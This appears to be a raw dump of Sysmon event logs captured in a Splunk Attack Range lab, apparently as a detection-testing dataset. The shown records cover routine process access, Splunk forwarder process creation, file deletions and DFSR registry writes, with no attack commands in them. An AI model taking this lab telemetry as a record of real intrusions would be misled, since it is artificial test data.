SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218040Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218039Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218038Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218037Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.208{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1367-6216-9304-000000003902}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218036Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218035Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.208{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1367-6216-9304-000000003902}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218034Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.209{4F8D34B0-1367-6216-9304-000000003902}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218033Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:47.083{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D128880B762ECBC67827D49A4A35AEC1,SHA256=A8C812E9154671E653E5ABF3D611E0F295D273B3BDB4772F7219034063D08169,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218064Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:48.348{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=996B444970BC7251B6352E5A6D018AB8,SHA256=F4648CAE71435A3F8A4C9DCD2E29EAA7DAB9BC285EF69EFBB2809087904C5279,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218063Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:48.348{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7770B1DB40FA12B145228C62637F57BA,SHA256=8081EE967228D0243F10E1A5C189F2CA4206B3EC2F5983E3EA31936D47BC315C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:48.350{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC7026977E187DEF968021F40BBD7FF9,SHA256=EE3610F6D00879371851CD2A3587A9F1DF2CA943532590CF12C55E3A207B4E26,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218079Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.551{4F8D34B0-1369-6216-9504-000000003902}30802484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218078Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.379{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1369-6216-9504-000000003902}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218077Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.379{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218076Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.379{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218075Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.379{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218074Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.379{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218073Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.379{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218072Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.379{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218071Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.379{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218070Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.379{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218069Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.379{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1369-6216-9504-000000003902}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218068Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.379{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218067Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.379{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1369-6216-9504-000000003902}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218066Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.380{4F8D34B0-1369-6216-9504-000000003902}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218065Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:49.364{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=485A70116CEC34B33F48CBEF52547660,SHA256=721C7B7EC1B56EAEA05ADD67697CFFA5C027E832A0118FCE8729DD38CB1A86C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:49.355{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=394408CAAAC1AF18A7C2899CB63FA781,SHA256=595D324C14D639D24808F2148C97B906C5C78C6EF4FC131EAA374D977D204E12,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000293541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:58:49.317{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6FC0DF5C-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6FC0DF5C-0000-0000-0000-100000000000.XML 13241300x8000000000000000293540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:58:49.302{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Config SourceDWORD (0x00000001) 13241300x8000000000000000293539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:58:49.302{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_BA30863B-E0B8-488B-829D-A0E9DE6AE59C.XML 10341000x8000000000000000293538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:49.233{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 